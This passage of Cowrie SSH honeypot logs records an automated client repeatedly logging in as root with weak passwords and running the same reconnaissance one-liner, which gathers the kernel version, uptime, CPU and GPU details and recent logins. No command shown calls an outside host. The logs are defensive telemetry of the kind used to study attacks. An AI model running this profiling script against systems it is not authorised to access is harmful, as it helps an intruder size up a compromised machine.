0","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-24T22:23:53.660673Z","src_ip":"205.210.31.236","session":"8093243461d7"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:24:00.319441Z","src_ip":"205.210.31.236","session":"8093243461d7"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":45474,"dst_ip":"1.2.3.4","dst_port":22,"session":"a547b8752fea","protocol":"ssh","message":"New connection: 196.251.115.108:45474 (1.2.3.4:22) [session: a547b8752fea]","sensor":"my-vps","timestamp":"2025-08-24T22:24:26.819206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:24:27.382258Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:24:27.383046Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:24:31.190489Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T22:24:31.820891Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-24T22:24:31.822333Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:24:31.823042Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:24:31.824514Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-24T22:24:31.826427Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:24:31.827400Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:24:31.828284Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-24T22:24:31.829783Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-24T22:24:31.830407Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:24:31.831413Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:24:31.832053Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:24:31.832940Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:24:31.833747Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-24T22:24:32.253331Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:24:32.254411Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:24:32.255359Z","src_ip":"196.251.115.108","session":"a547b8752fea"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":44668,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff92695ad108","protocol":"ssh","message":"New connection: 196.251.115.108:44668 (1.2.3.4:22) [session: ff92695ad108]","sensor":"my-vps","timestamp":"2025-08-24T22:25:23.443792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:25:23.897115Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:25:23.898156Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.020694Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T22:25:27.557414Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.558350Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.559111Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.560709Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.562393Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.563713Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.564782Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.566214Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.567131Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.567964Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.568798Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.569781Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.570614Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.944695Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.945885Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:25:27.947324Z","src_ip":"196.251.115.108","session":"ff92695ad108"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":52718,"dst_ip":"1.2.3.4","dst_port":22,"session":"63886070a17f","protocol":"ssh","message":"New connection: 196.251.115.108:52718 (1.2.3.4:22) [session: 63886070a17f]","sensor":"my-vps","timestamp":"2025-08-24T22:26:17.206777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:26:17.505237Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:26:17.506017Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.login.success","username":"root","password":"123123","message":"login attempt [root/123123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:26:21.375097Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T22:26:22.116275Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 